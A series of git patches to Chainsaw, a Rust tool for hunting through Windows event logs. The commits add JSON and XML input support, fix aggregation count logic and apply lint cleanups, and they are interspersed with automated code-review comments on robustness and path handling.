@@ -329,85 +395,106 @@ pub fn print_csv( } } csv.write_record(cells)?; - for (timestamp, kind, ids) in grouped { - // FIXME: Sort tags - //tags.sort(); + + for grouping in group { let localised = if let Some(timezone) = timezone { timezone - .from_local_datetime(timestamp) + .from_local_datetime(grouping.timestamp) .single() .expect("failed to localise timestamp") .to_rfc3339() } else if local { - Utc.from_local_datetime(timestamp) + Utc.from_local_datetime(grouping.timestamp) .single() .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(grouping.timestamp.clone(), Utc).to_rfc3339() }; - let mut cells = vec![localised]; - cells.push( - ids.iter() - .map(|(_, rid)| { - format!( - "{}", - rules.get(rid).expect("could not get rule").name.as_str() - ) - }) - .collect::>() - .join(";"), - ); - let document = match kind { - Kind::Individual { document } => document, + + // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some + // corners here! + let count; + let document = match grouping.kind { + Kind::Individual { document } => { + count = 1; + document + } Kind::Aggregate { documents } => { + count = documents.len(); documents.first().expect("could not get document") } }; + + let mut rows = vec![]; + let mut seen: HashMap> = HashMap::new(); if headers.is_empty() { let json = serde_json::to_string(&document.data) .expect("could not serialise document"); - cells.push(json); + let rules = grouping.hits.iter().map(|hit| hit.rule).collect(); + rows.push((0, vec![json])); + seen.insert(0, rules); } else { - // This is really complicated, we could land in the same group but be from - // different hunts that have different headers, that also could even overlap... - // Because we group we won't be able to reliably handle clashes. 
- let mut hids = HashSet::new(); - for (hid, _) in &ids { - hids.insert(hid); - } let wrapper = match &document.kind { FileKind::Evtx => crate::evtx::Wrapper(&document.data), - _ => continue, + FileKind::Unknown => continue, }; - let mut hdrs = HashMap::new(); - for hid in hids { - let hunt = hunts.get(hid).expect("could not get hunt"); - let flds: HashMap<_, _> = hunt + // What we do here is hash each row since if the fields are the same but the values + // are not then we would lose data, so in this case we split the row + for hit in &grouping.hits { + let fields: HashMap<_, _> = hit + .hunt .mapper .fields() .iter() - .map(|f| (&f.name, &f.from)) + .map(|f| (&f.name, f)) .collect(); + let mut cells = vec![]; + let mut hasher = DefaultHasher::new(); for header in &headers { - if let Some(from) = flds.get(header) { - let mapped = hunt.mapper.mapped(&wrapper); - if let Some(value) = mapped.find(&from).and_then(|v| v.to_string()) - { - hdrs.insert(header, value); + if let Some(field) = fields.get(header) { + let mapped = hit.hunt.mapper.mapped(&wrapper); + if let Some(value) = mapped.find(&field.from) { + match value.to_string() { + Some(v) => { + v.hash(&mut hasher); + cells.push(v); + } + None => { + "".hash(&mut hasher); + cells.push("".to_owned()); + } + } + continue; } + } else if header == "count" { + cells.push(count.to_string()); + continue; } - } - } - for header in &headers { - if let Some(value) = hdrs.get(header) { - cells.push(value.to_string()); - } else { cells.push("".to_owned()); } + let id = hasher.finish(); + if !seen.contains_key(&id) { + rows.push((id, cells)); + } + let rules = seen.entry(id).or_insert(vec![]); + (*rules).push(hit.rule); } } - csv.write_record(cells)?; + + for (id, row) in rows { + let rules = seen.remove(&id).expect("could not get rules"); + let mut cells = vec![localised.clone()]; + cells.push( + rules + .iter() + .map(|rule| format!("{}", rule.name)) + .collect::>() + .join(";"), + ); + cells.extend(row); + 
csv.write_record(cells)?; + } } } } diff --git a/src/hunt.rs b/src/hunt.rs index fb0d0a3d..e081de6c 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -344,6 +344,15 @@ pub struct Hunt { pub rule: RuleKind, } +impl Hunt { + pub fn is_aggregation(&self) -> bool { + if let HuntKind::Rule { aggregate, .. } = &self.kind { + return aggregate.is_some(); + } + false + } +} + pub struct HunterInner { hunts: Vec, rules: HashMap>, From 1386c24e3f6499232c6ab4905af3a7260ac28bf3 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 12:54:21 +0100 Subject: [PATCH 11/77] fix: aggregation count logic was incorrect --- Cargo.lock | 11 +++++------ src/hunt.rs | 10 +++++----- 2 files changed, 10 insertions(+), 11 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 0616c4fe..7bc20f9b 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -537,7 +537,7 @@ checksum = "9be70c98951c83b8d2f8f60d7065fa6d5146873094452a1008da8c2f1e4205ad" dependencies = [ "cfg-if", "libc", - "wasi 0.10.0+wasi-snapshot-preview1", + "wasi 0.10.2+wasi-snapshot-preview1", ] [[package]] @@ -1272,12 +1272,11 @@ dependencies = [ [[package]] name = "time" -version = "0.1.44" +version = "0.1.43" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" +checksum = "ca8a50ef2360fbd1eeb0ecd46795a87a19024eb4b53c5dc916ca1fd95fe62438" dependencies = [ "libc", - "wasi 0.10.0+wasi-snapshot-preview1", "winapi", ] @@ -1393,9 +1392,9 @@ checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" [[package]] name = "wasi" -version = "0.10.0+wasi-snapshot-preview1" +version = "0.10.2+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" +checksum = "fd6fbd9a79829dd1ad0cc20627bf1ed606756a7f77edff7b66b7064f9cb327c6" [[package]] name = "winapi" diff --git a/src/hunt.rs b/src/hunt.rs index e081de6c..7e9c880d 100644 
--- a/src/hunt.rs +++ b/src/hunt.rs @@ -516,11 +516,11 @@ impl Hunter { for (id, (aggregate, docs)) in aggregates { for ids in docs.values() { let hit = match aggregate.count { - Pattern::Equal(i) => (i as usize) == ids.len(), - Pattern::GreaterThan(i) => (i as usize) > ids.len(), - Pattern::GreaterThanOrEqual(i) => (i as usize) >= ids.len(), - Pattern::LessThan(i) => (i as usize) < ids.len(), - Pattern::LessThanOrEqual(i) => (i as usize) <= ids.len(), + Pattern::Equal(i) => ids.len() == (i as usize), + Pattern::GreaterThan(i) => ids.len() > (i as usize), + Pattern::GreaterThanOrEqual(i) => ids.len() >= (i as usize), + Pattern::LessThan(i) => ids.len() < (i as usize), + Pattern::LessThanOrEqual(i) => ids.len() <= (i as usize), _ => false, }; if hit { From b975b06b75d41b23559071710e598ec7a8089aa1 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 13:53:00 +0100 Subject: [PATCH 12/77] feat: add in basic json file support --- src/cli.rs | 29 +++++++++++------ src/file/json.rs | 46 ++++++++++++++++++++++++++ src/file/mod.rs | 18 +++++++++- src/hunt.rs | 16 ++++++--- src/search.rs | 85 ++++++++++++++++++++++++++++-------------------- 5 files changed, 143 insertions(+), 51 deletions(-) create mode 100644 src/file/json.rs diff --git a/src/cli.rs b/src/cli.rs index 36cad43e..e8178ea2 100644 --- a/src/cli.rs +++ b/src/cli.rs 
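Review bot: With the operands now in the right order, the remaining `_ => false` arm in the `aggregate.count` match still means an aggregation rule whose `count` uses any other `Pattern` variant can never produce a hit, and nothing tells the operator that the rule is effectively disabled. Rejecting unsupported patterns when the rule is loaded, or at least warning once here (`cs_eyellowln!("unsupported count pattern in aggregation {}", id)`, assuming `id` identifies the rule), would stop detections from silently going missing. If `i` is a signed integer, `i as usize` also wraps for negative values, so a non-negative type or a load-time check would be safer; its type is not visible in this hunk. The enclosing method continues outside the hunk.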
@@ -224,13 +224,18 @@ pub fn print_detections( )); seen.insert(0, rules); } else { - let wrapper = match &document.kind { - FileKind::Evtx => crate::evtx::Wrapper(&document.data), - FileKind::Unknown => continue, - }; // What we do here is hash each row since if the fields are the same but the values // are not then we would lose data, so in this case we split the row for hit in &grouping.hits { + let wrapper; + let mapped = match &document.kind { + FileKind::Evtx => { + wrapper = crate::evtx::Wrapper(&document.data); + hit.hunt.mapper.mapped(&wrapper) + } + FileKind::Json => hit.hunt.mapper.mapped(&document.data), + FileKind::Unknown => continue, + }; let fields: HashMap<_, _> = hit .hunt .mapper @@ -242,7 +247,6 @@ pub fn print_detections( let mut hasher = DefaultHasher::new(); for header in &headers { if let Some(field) = fields.get(header) { - let mapped = hit.hunt.mapper.mapped(&wrapper); if let Some(value) = mapped.find(&field.from) { match value.to_string() { Some(v) => { @@ -435,13 +439,19 @@ pub fn print_csv( rows.push((0, vec![json])); seen.insert(0, rules); } else { - let wrapper = match &document.kind { - FileKind::Evtx => crate::evtx::Wrapper(&document.data), - FileKind::Unknown => continue, - }; // What we do here is hash each row since if the fields are the same but the values // are not then we would lose data, so in this case we split the row for hit in &grouping.hits { + let wrapper; + let mapped = match &document.kind { + FileKind::Evtx => { + wrapper = crate::evtx::Wrapper(&document.data); + hit.hunt.mapper.mapped(&wrapper) + } + FileKind::Json => hit.hunt.mapper.mapped(&document.data), + FileKind::Unknown => continue, + }; + let fields: HashMap<_, _> = hit .hunt .mapper @@ -453,7 +463,6 @@ pub fn print_csv( let mut hasher = DefaultHasher::new(); for header in &headers { if let Some(field) = fields.get(header) { - let mapped = hit.hunt.mapper.mapped(&wrapper); if let Some(value) = mapped.find(&field.from) { match value.to_string() { Some(v) => { 
diff --git a/src/file/json.rs b/src/file/json.rs new file mode 100644 index 00000000..1c3958dc --- /dev/null +++ b/src/file/json.rs @@ -0,0 +1,46 @@ +use std::fs::File; +use std::io::BufReader; +use std::path::Path; + +use anyhow::Error; +use regex::RegexSet; +pub use serde_json::Value as Json; + +use crate::search::Searchable; + +pub struct Parser { + pub inner: Option, +} + +impl Parser { + pub fn load(path: &Path) -> crate::Result { + let file = File::open(path)?; + let reader = BufReader::new(file); + let json = serde_json::from_reader(reader)?; + Ok(Self { inner: Some(json) }) + } + + pub fn parse(&mut self) -> impl Iterator> + '_ { + if let Some(json) = self.inner.take() { + return match json { + Json::Array(array) => array + .into_iter() + .map(|x| Ok(x)) + .collect::>() + .into_iter(), + _ => vec![json] + .into_iter() + .map(|x| Ok(x)) + .collect::>() + .into_iter(), + }; + } + vec![].into_iter() + } +} + +impl Searchable for Json { + fn matches(&self, regex: &RegexSet) -> bool { + regex.is_match(&self.to_string()) + } +} diff --git a/src/file/mod.rs b/src/file/mod.rs index 7096ef36..03f27fca 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -4,12 +4,15 @@ use std::path::{Path, PathBuf}; use serde::{Deserialize, Serialize}; use self::evtx::{Evtx, Parser as EvtxParser}; +use self::json::{Json, Parser as JsonParser}; pub mod evtx; +pub mod json; #[derive(Clone)] pub enum Document { Evtx(Evtx), + Json(Json), } pub struct Documents<'a> { @@ -20,6 +23,7 @@ pub struct Documents<'a> { #[serde(rename_all = "snake_case")] pub enum Kind { Evtx, + Json, Unknown, } @@ -42,6 +46,7 @@ impl Iterator for Unknown { pub enum Parser { Evtx(EvtxParser), + Json(JsonParser), Unknown, } @@ -58,6 +63,9 @@ impl Reader { "evtx" => Ok(Self { parser: Parser::Evtx(EvtxParser::load(file)?), }), + "json" => Ok(Self { + parser: Parser::Json(JsonParser::load(file)?), + }), _ => { if load_unknown { if skip_errors { 
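Review bot: `Parser::load` in the new `src/file/json.rs` deserialises the whole file into one `serde_json::Value` via `serde_json::from_reader`, so memory use is proportional to the input and a large event export is held entirely in RAM before `parse` yields its first document; the `src/file/mod.rs` hunk in the same commit also calls `JsonParser::load` as a fallback when sniffing unknown files, so any large unrecognised input pays that cost too. That is fine for a first cut but should be stated on the function, e.g. `/// Reads and fully deserialises the file into memory; a top-level array is yielded element by element, any other value as a single document.` The `Searchable` impl re-serialises the document on every call (`regex.is_match(&self.to_string())`), which is worth a comment as well since it runs once per document per search.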
@@ -81,6 +89,10 @@ impl Reader { return Ok(Self { parser: Parser::Evtx(parser), }); + } else if let Ok(parser) = JsonParser::load(file) { + return Ok(Self { + parser: Parser::Json(parser), + }); } if skip_errors { cs_eyellowln!("file type is not known"); @@ -106,7 +118,10 @@ impl Reader { parser .parse() .map(|r| r.map(|d| Document::Evtx(d)).map_err(|e| e.into())), - ), + ) + as Box> + 'a>, + Parser::Json(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Json(d)))) + as Box> + 'a>, Parser::Unknown => { Box::new(Unknown) as Box> + 'a> } @@ -117,6 +132,7 @@ impl Reader { pub fn kind(&self) -> Kind { match self.parser { Parser::Evtx(_) => Kind::Evtx, + Parser::Json(_) => Kind::Json, Parser::Unknown => Kind::Unknown, } } diff --git a/src/hunt.rs b/src/hunt.rs index 7e9c880d..91418181 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -374,7 +374,7 @@ impl Hunter { HunterBuilder::new() } - pub fn hunt(&self, file: &Path) -> crate::Result> { + pub fn hunt<'a>(&self, file: &Path) -> crate::Result> { let mut reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; let kind = reader.kind(); // This can be optimised better ;) @@ -392,16 +392,20 @@ impl Hunter { return Err(e); } }; - let wrapper = match &document { - File::Evtx(evtx) => crate::evtx::Wrapper(&evtx.data), - }; let mut hits = vec![]; for hunt in &self.inner.hunts { if hunt.file != kind { continue; } - let mapped = hunt.mapper.mapped(&wrapper); + let wrapper; + let mapped = match &document { + File::Evtx(evtx) => { + wrapper = crate::evtx::Wrapper(&evtx.data); + hunt.mapper.mapped(&wrapper) + } + File::Json(json) => hunt.mapper.mapped(json), + }; let timestamp = match mapped.find(&hunt.timestamp) { Some(value) => match value.as_str() { @@ -501,6 +505,7 @@ impl Hunter { if !hits.is_empty() { let data = match &document { File::Evtx(evtx) => evtx.data.clone(), + File::Json(json) => json.clone(), }; detections.push(Detections { hits, 
@@ -530,6 +535,7 @@ impl Hunter { let (document, timestamp) = files.get(&id).expect("could not get document"); let data = match &document { File::Evtx(evtx) => evtx.data.clone(), + File::Json(json) => json.clone(), }; documents.push(Document { kind: kind.clone(), diff --git a/src/search.rs b/src/search.rs index 19a016f6..66a2f6fc 100644 --- a/src/search.rs +++ b/src/search.rs @@ -54,38 +54,37 @@ impl<'a> Iterator for Iter<'a> { .as_ref() .expect("could not get timestamp"); // TODO: Default to RFC 3339 - let timestamp = match &document { + let result = match &document { Document::Evtx(evtx) => match crate::evtx::Wrapper(&evtx.data).find(&field) { Some(value) => match value.as_str() { Some(timestamp) => { - match NaiveDateTime::parse_from_str( - timestamp, - "%Y-%m-%dT%H:%M:%S%.6fZ", - ) { - Ok(t) => t, - Err(e) => { - if self.searcher.skip_errors { - cs_eyellowln!( - "failed to parse timestamp '{}' - {}", - timestamp, - e, - ); - continue; - } else { - return Some(Err(anyhow::anyhow!( - "failed to parse timestamp '{}' - {}", - timestamp, - e - ))); - } - } - } + NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") + } + None => continue, + }, + None => continue, + }, + Document::Json(json) => match json.find(&field) { + Some(value) => match value.as_str() { + Some(timestamp) => { + NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") } None => continue, }, None => continue, }, }; + let timestamp = match result { + Ok(t) => t, + Err(e) => { + if self.searcher.skip_errors { + cs_eyellowln!("failed to parse timestamp - {}", e); + continue; + } else { + return Some(Err(anyhow::anyhow!("failed to parse timestamp - {}", e))); + } + } + }; // TODO: Not sure if this is correct... let localised = if let Some(timezone) = self.searcher.timezone { let local = match timezone.from_local_datetime(×tamp).single() { 
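Review bot: The consolidated error path at the end of the `src/search.rs` hunk reports only `failed to parse timestamp - {}`, dropping the offending string that the removed branch-local messages printed (`failed to parse timestamp '{}' - {}`), which makes a bad timestamp field much harder to track down in a large export. Keeping the raw value is straightforward if `result` also carries it, e.g. `Some(timestamp) => (timestamp, NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ"))` and then `Err(e) => ... "failed to parse timestamp '{}' - {}", raw, e`. Separately, the new `Document::Json` arm copies the Evtx behaviour of `None => continue` when the timestamp field is absent or not a string, so such events are dropped from search output with no message even when `skip_errors` is false; a `cs_eyellowln!` there would at least make the omission visible. The `%Y-%m-%dT%H:%M:%S%.6fZ` format is evtx-specific, as the existing TODO about RFC 3339 already hints. The enclosing `next` implementation starts and ends outside the hunk.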
@@ -128,20 +127,36 @@ impl<'a> Iterator for Iter<'a> { } } } - let r = match document { - Document::Evtx(evtx) => evtx, - }; - if let Some(expression) = &self.searcher.tau { - if !tau_engine::core::solve(&expression, &crate::evtx::Wrapper(&r.data)) { - continue; + // TODO: Remove duplication... + match document { + Document::Evtx(evtx) => { + let wrapper = crate::evtx::Wrapper(&evtx.data); + if let Some(expression) = &self.searcher.tau { + if !tau_engine::core::solve(&expression, &wrapper) { + continue; + } + if self.searcher.regex.len() == 0 { + return Some(Ok(evtx.data)); + } + } + if evtx.matches(&self.searcher.regex) { + return Some(Ok(evtx.data)); + } } - if self.searcher.regex.len() == 0 { - return Some(Ok(r.data)); + Document::Json(json) => { + if let Some(expression) = &self.searcher.tau { + if !tau_engine::core::solve(&expression, &json) { + continue; + } + if self.searcher.regex.len() == 0 { + return Some(Ok(json)); + } + } + if json.matches(&self.searcher.regex) { + return Some(Ok(json)); + } } - } - if r.matches(&self.searcher.regex) { - return Some(Ok(r.data)); - } + }; } None } From 7f976a3e056366cbea539cc01e9ec0e2c0e102e4 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 14:25:10 +0100 Subject: [PATCH 13/77] feat: add basic xml file support --- Cargo.lock | 13 ++++++++++++- Cargo.toml | 1 + src/cli.rs | 8 ++++++-- src/file/mod.rs | 15 +++++++++++++++ src/file/xml.rs | 42 ++++++++++++++++++++++++++++++++++++++++++ src/hunt.rs | 3 +++ src/search.rs | 4 ++-- 7 files changed, 81 insertions(+), 5 deletions(-) create mode 100644 src/file/xml.rs diff --git a/Cargo.lock b/Cargo.lock index 7bc20f9b..e349abe1 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -168,6 +168,7 @@ dependencies = [ "once_cell", "paste", "prettytable-rs", + "quick-xml 0.23.0", "rayon", "regex 1.5.6", "serde", @@ -499,7 +500,7 @@ dependencies = [ "encoding", "indoc", "log", - "quick-xml", + "quick-xml 0.22.0", "rayon", "serde", "serde_json", 
@@ -882,6 +883,16 @@ dependencies = [ "memchr", ] +[[package]] +name = "quick-xml" +version = "0.23.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9279fbdacaad3baf559d8cabe0acc3d06e30ea14931af31af79578ac0946decc" +dependencies = [ + "memchr", + "serde", +] + [[package]] name = "quote" version = "1.0.18" diff --git a/Cargo.toml b/Cargo.toml index e0805f78..e5bea585 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -19,6 +19,7 @@ evtx = "0.7" indicatif = "0.16" once_cell = "1.0" prettytable-rs = "0.8" +quick-xml = { version = "0.23", features = ["serialize"] } rayon = "1.5" regex = "1.5" serde = { version = "1.0", features = ["derive"] } diff --git a/src/cli.rs b/src/cli.rs index e8178ea2..fdf35bbd 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -233,7 +233,9 @@ pub fn print_detections( wrapper = crate::evtx::Wrapper(&document.data); hit.hunt.mapper.mapped(&wrapper) } - FileKind::Json => hit.hunt.mapper.mapped(&document.data), + FileKind::Json | FileKind::Xml => { + hit.hunt.mapper.mapped(&document.data) + } FileKind::Unknown => continue, }; let fields: HashMap<_, _> = hit @@ -448,7 +450,9 @@ pub fn print_csv( wrapper = crate::evtx::Wrapper(&document.data); hit.hunt.mapper.mapped(&wrapper) } - FileKind::Json => hit.hunt.mapper.mapped(&document.data), + FileKind::Json | FileKind::Xml => { + hit.hunt.mapper.mapped(&document.data) + } FileKind::Unknown => continue, }; diff --git a/src/file/mod.rs b/src/file/mod.rs index 03f27fca..1d75452d 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -5,14 +5,17 @@ use serde::{Deserialize, Serialize}; use self::evtx::{Evtx, Parser as EvtxParser}; use self::json::{Json, Parser as JsonParser}; +use self::xml::{Parser as XmlParser, Xml}; pub mod evtx; pub mod json; +pub mod xml; #[derive(Clone)] pub enum Document { Evtx(Evtx), Json(Json), + Xml(Xml), } pub struct Documents<'a> { @@ -24,6 +27,7 @@ pub struct Documents<'a> { pub enum Kind { Evtx, Json, + Xml, Unknown, } 
@@ -47,6 +51,7 @@ impl Iterator for Unknown { pub enum Parser { Evtx(EvtxParser), Json(JsonParser), + Xml(XmlParser), Unknown, } @@ -66,6 +71,9 @@ impl Reader { "json" => Ok(Self { parser: Parser::Json(JsonParser::load(file)?), }), + "xml" => Ok(Self { + parser: Parser::Xml(XmlParser::load(file)?), + }), _ => { if load_unknown { if skip_errors { @@ -93,6 +101,10 @@ impl Reader { return Ok(Self { parser: Parser::Json(parser), }); + } else if let Ok(parser) = XmlParser::load(file) { + return Ok(Self { + parser: Parser::Xml(parser), + }); } if skip_errors { cs_eyellowln!("file type is not known"); @@ -122,6 +134,8 @@ impl Reader { as Box> + 'a>, Parser::Json(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Json(d)))) as Box> + 'a>, + Parser::Xml(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Xml(d)))) + as Box> + 'a>, Parser::Unknown => { Box::new(Unknown) as Box> + 'a> } @@ -133,6 +147,7 @@ impl Reader { match self.parser { Parser::Evtx(_) => Kind::Evtx, Parser::Json(_) => Kind::Json, + Parser::Xml(_) => Kind::Xml, Parser::Unknown => Kind::Unknown, } } diff --git a/src/file/xml.rs b/src/file/xml.rs new file mode 100644 index 00000000..00913eb9 --- /dev/null +++ b/src/file/xml.rs 
@@ -0,0 +1,42 @@ +use std::fs::File; +use std::io::BufReader; +use std::path::Path; + +use anyhow::Error; +use serde_json::Value as Json; + +// NOTE: Because we just deserialize into JSON, this looks pretty much the same as the JSON +// implementation. Maybe in time we will parse it differently... + +pub type Xml = Json; + +pub struct Parser { + pub inner: Option, +} + +impl Parser { + pub fn load(path: &Path) -> crate::Result { + let file = File::open(path)?; + let reader = BufReader::new(file); + let xml = quick_xml::de::from_reader(reader)?; + Ok(Self { inner: Some(xml) }) + } + + pub fn parse(&mut self) -> impl Iterator> + '_ { + if let Some(json) = self.inner.take() { + return match json { + Json::Array(array) => array + .into_iter() + .map(|x| Ok(x)) + .collect::>() + .into_iter(), + _ => vec![json] + .into_iter() + .map(|x| Ok(x)) + .collect::>() + .into_iter(), + }; + } + vec![].into_iter() + } +} diff --git a/src/hunt.rs b/src/hunt.rs index 91418181..703a735d 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -405,6 +405,7 @@ impl Hunter { hunt.mapper.mapped(&wrapper) } File::Json(json) => hunt.mapper.mapped(json), + File::Xml(xml) => hunt.mapper.mapped(xml), }; let timestamp = match mapped.find(&hunt.timestamp) { @@ -506,6 +507,7 @@ impl Hunter { let data = match &document { File::Evtx(evtx) => evtx.data.clone(), File::Json(json) => json.clone(), + File::Xml(xml) => xml.clone(), }; detections.push(Detections { hits, @@ -536,6 +538,7 @@ impl Hunter { let data = match &document { File::Evtx(evtx) => evtx.data.clone(), File::Json(json) => json.clone(), + File::Xml(xml) => xml.clone(), }; documents.push(Document { kind: kind.clone(), diff --git a/src/search.rs b/src/search.rs index 66a2f6fc..34026405 100644 --- a/src/search.rs +++ b/src/search.rs 
@@ -64,7 +64,7 @@ impl<'a> Iterator for Iter<'a> { }, None => continue, }, - Document::Json(json) => match json.find(&field) { + Document::Json(json) | Document::Xml(json) => match json.find(&field) { Some(value) => match value.as_str() { Some(timestamp) => { NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") @@ -143,7 +143,7 @@ impl<'a> Iterator for Iter<'a> { return Some(Ok(evtx.data)); } } - Document::Json(json) => { + Document::Json(json) | Document::Xml(json) => { if let Some(expression) = &self.searcher.tau { if !tau_engine::core::solve(&expression, &json) { continue; From 8192a542afce4cac2d55a314fd829c2ab7e8c54f Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 14:25:55 +0100 Subject: [PATCH 14/77] build: bump to v2.0.0-alpha.3 --- Cargo.lock | 2 +- Cargo.toml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index e349abe1..367822c9 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.2" +version = "2.0.0-alpha.3" dependencies = [ "aho-corasick 0.7.18", "anyhow", diff --git a/Cargo.toml b/Cargo.toml index e5bea585..83623c75 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.2" +version = "2.0.0-alpha.3" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] From 58a29bf6e309fa4c0d7426f4392d30a2e9be3a3c Mon Sep 17 00:00:00 2001 
From: Alex Kornitzer Date: Tue, 7 Jun 2022 15:38:43 +0100 Subject: [PATCH 15/77] refactor: apply clippy suggestions --- src/cli.rs | 23 +++++----- src/file/evtx.rs | 2 +- src/file/json.rs | 8 +--- src/file/mod.rs | 22 +++++---- src/file/xml.rs | 8 +--- src/hunt.rs | 103 ++++++++++++++++++++----------------------- src/main.rs | 2 +- src/rule/chainsaw.rs | 4 +- src/rule/mod.rs | 16 +++---- src/search.rs | 16 +++---- 10 files changed, 94 insertions(+), 110 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index fdf35bbd..0c678510 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -54,9 +54,9 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String // Take the context_field and format it for printing. Remove newlines, break into even chunks etc. // If this is a scheduled task we need to parse the XML to make it more readable let mut data = data - .replace("\n", "") - .replace("\r", "") - .replace("\t", "") + .replace('\n', "") + .replace('\r', "") + .replace('\t', "") .replace(" ", " ") .chars() .collect::>() @@ -163,7 +163,7 @@ pub fn print_detections( keys.sort(); for key in keys { let mut group = groups.remove(&key).expect("could not get grouping!"); - group.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + group.sort_by(|x, y| x.timestamp.cmp(y.timestamp)); let mut table = Table::new(); table.set_format(format); @@ -195,7 +195,7 @@ pub fn print_detections( .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(grouping.timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(*grouping.timestamp, Utc).to_rfc3339() }; // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some 
@@ -383,10 +383,10 @@ pub fn print_csv( keys.sort(); for key in keys { let mut group = groups.remove(&key).expect("could not get grouping!"); - group.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + group.sort_by(|x, y| x.timestamp.cmp(y.timestamp)); // FIXME: Handle name clashes - let filename = format!("{}.csv", key.replace(" ", "_").to_lowercase()); + let filename = format!("{}.csv", key.replace(' ', "_").to_lowercase()); let path = directory.join(&filename); let mut csv = prettytable::csv::Writer::from_path(path)?; cs_eprintln!("[+] Created {}", filename); @@ -415,7 +415,7 @@ pub fn print_csv( .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(grouping.timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(*grouping.timestamp, Utc).to_rfc3339() }; // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some @@ -501,7 +501,7 @@ pub fn print_csv( cells.push( rules .iter() - .map(|rule| format!("{}", rule.name)) + .map(|rule| rule.name.to_string()) .collect::>() .join(";"), ); @@ -542,7 +542,7 @@ pub fn print_json( } let mut detections = detections .iter() - .map(|d| { + .flat_map(|d| { let mut detections = Vec::with_capacity(d.hits.len()); for hit in &d.hits { let (kind, rule) = rs.get(&hit.rule).expect("could not get rule!"); @@ -558,7 +558,7 @@ pub fn print_json( .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(hit.timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(hit.timestamp, Utc).to_rfc3339() }; detections.push(Detection { authors: &rule.authors, @@ -573,7 +573,6 @@ pub fn print_json( } detections }) - .flatten() .collect::>(); detections.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); cs_print_json!(&detections)?; diff --git a/src/file/evtx.rs b/src/file/evtx.rs index 9e6b88dd..9f2beba1 100644 --- a/src/file/evtx.rs +++ b/src/file/evtx.rs 
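Review bot: In the `print_csv` hunk (`@@ -383,10 +383,10 @@`) the output file name is derived from `key` with only spaces replaced and then handed to `directory.join(&filename)`, so a group name containing a path separator or `..` is joined as path components and the CSV lands outside the chosen directory. `key` appears to be the rule or mapping group name (its origin is outside the hunk), which commonly comes from third-party rule packs. Restricting the name to a safe character set, `let filename = format!("{}.csv", key.chars().map(|c| if c.is_ascii_alphanumeric() { c.to_ascii_lowercase() } else { '_' }).collect::<String>());`, addresses this together with the existing `FIXME` on name clashes. `print_csv` begins outside the hunk.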
